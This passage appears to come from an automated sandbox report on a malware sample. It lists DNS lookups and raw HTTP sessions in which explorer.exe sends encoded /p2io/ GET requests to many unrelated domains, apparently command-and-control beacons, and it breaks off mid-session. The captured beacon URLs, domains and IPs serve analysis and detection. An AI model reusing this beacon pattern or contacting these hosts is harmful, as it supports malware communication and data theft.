                                                                                          Jun 10, 2021 19:13:59.594762087 CEST8.8.8.8192.168.2.30xc60eNo error (0)www.essentiallyourscandles.comessentially-yours-candles-by-taylor.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:59.594762087 CEST8.8.8.8192.168.2.30xc60eNo error (0)essentially-yours-candles-by-taylor.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:13:59.594762087 CEST8.8.8.8192.168.2.30xc60eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:04.839838028 CEST8.8.8.8192.168.2.30x2aa8No error (0)www.ololmychartlogin.com212.32.237.92A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:10.801793098 CEST8.8.8.8192.168.2.30x938fServer failure (2)www.advancedaccessapplications.comnonenoneA (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:15.976633072 CEST8.8.8.8192.168.2.30xa564No error (0)www.swayam-moj.comswayam-moj.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:15.976633072 CEST8.8.8.8192.168.2.30xa564No error (0)swayam-moj.com199.195.117.147A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:21.398601055 CEST8.8.8.8192.168.2.30x63f9No error (0)www.brunoecatarina.com54.85.86.211A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:27.123611927 CEST8.8.8.8192.168.2.30x1c4bNo error (0)www.ruhexuangou.com23.82.57.32A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)www.boogerstv.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:33.411318064 CEST8.8.8.8192.168.2.30xb54cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST8.8.8.8192.168.2.30x8d55No error (0)www.totally-seo.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST8.8.8.8192.168.2.30x8d55No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST8.8.8.8192.168.2.30x8d55No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST8.8.8.8192.168.2.30x8d55No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                          Jun 10, 2021 19:14:38.875571966 CEST8.8.8.8192.168.2.30x8d55No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.yunlimall.com
                                                                                          • www.painhut.com
                                                                                          • www.cleanxcare.com
                                                                                          • www.thriveglucose.com
                                                                                          • www.essentiallyourscandles.com
                                                                                          • www.ololmychartlogin.com
                                                                                          • www.swayam-moj.com
                                                                                          • www.brunoecatarina.com
                                                                                          • www.ruhexuangou.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.349736142.111.47.280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:32.137279034 CEST1340OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01 HTTP/1.1
                                                                                          Host: www.yunlimall.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:32.336549997 CEST1341INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Thu, 10 Jun 2021 17:13:21 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 785
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d6 ea d6 de b7 bd be c4 d0 c2 b2 c4 c1 cf d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.34973713.59.53.24480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:43.632910013 CEST1342OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3Z+wGMxAxa HTTP/1.1
                                                                                          Host: www.painhut.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:43.774286032 CEST1343INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 10 Jun 2021 17:13:43 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 153
                                                                                          Connection: close
                                                                                          Server: nginx/1.16.1
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.34974278.31.67.9180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:48.962518930 CEST1346OUTGET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.cleanxcare.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:49.018184900 CEST1358INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 707
                                                                                          Date: Thu, 10 Jun 2021 17:13:48 GMT
                                                                                          Location: https://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Vary: User-Agent
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.349743184.168.131.24180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:54.289207935 CEST3846OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1
                                                                                          Host: www.thriveglucose.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:54.504077911 CEST3846INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx/1.16.1
                                                                                          Date: Thu, 10 Jun 2021 17:13:54 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Location: https://glucoserevival.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.34974523.227.38.7480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:59.639724970 CEST3877OUTGET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.essentiallyourscandles.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:59.731450081 CEST3879INHTTP/1.1 403 Forbidden
                                                                                          Date: Thu, 10 Jun 2021 17:13:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          X-Sorting-Hat-PodId: 149
                                                                                          X-Sorting-Hat-ShopId: 48654778518
                                                                                          X-Dc: gcp-europe-west1
                                                                                          X-Request-ID: 6bafc287-af0f-4d51-b75f-3e16de18de5f
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Download-Options: noopen
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          cf-request-id: 0a9883ae7900004e49f792f000000001
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 65d43bc3fc284e49-FRA
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0
                                                                                          Jun 10, 2021 19:13:59.731489897 CEST3880INData Raw: 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b
                                                                                          Data Ascii: ;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6r
                                                                                          Jun 10, 2021 19:13:59.731511116 CEST3882INData Raw: c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72 6d 69 73 73 c3 a3 6f 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f
                                                                                          Data Ascii: no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                                          Jun 10, 2021 19:13:59.731532097 CEST3883INData Raw: 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74
                                                                                          Data Ascii: }, "hi": { "title": " ", "content-title": " "
                                                                                          Jun 10, 2021 19:13:59.731551886 CEST3883INData Raw: 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20
                                                                                          Data Ascii: try code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translatio


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.349746212.32.237.9280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:04.896286964 CEST3887OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1
                                                                                          Host: www.ololmychartlogin.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:05.727042913 CEST3896INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 10 Jun 2021 17:14:04 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=423ab2aa-ca0f-11eb-b7d8-a9a95aee65c0; path=/; domain=.ololmychartlogin.com; expires=Tue, 28 Jun 2089 20:28:11 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.349749199.195.117.14780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:16.131238937 CEST3904OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1
                                                                                          Host: www.swayam-moj.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:16.283550024 CEST3904INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 10 Jun 2021 17:14:16 GMT
                                                                                          Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.34975154.85.86.21180C:\Windows\explorer.exe
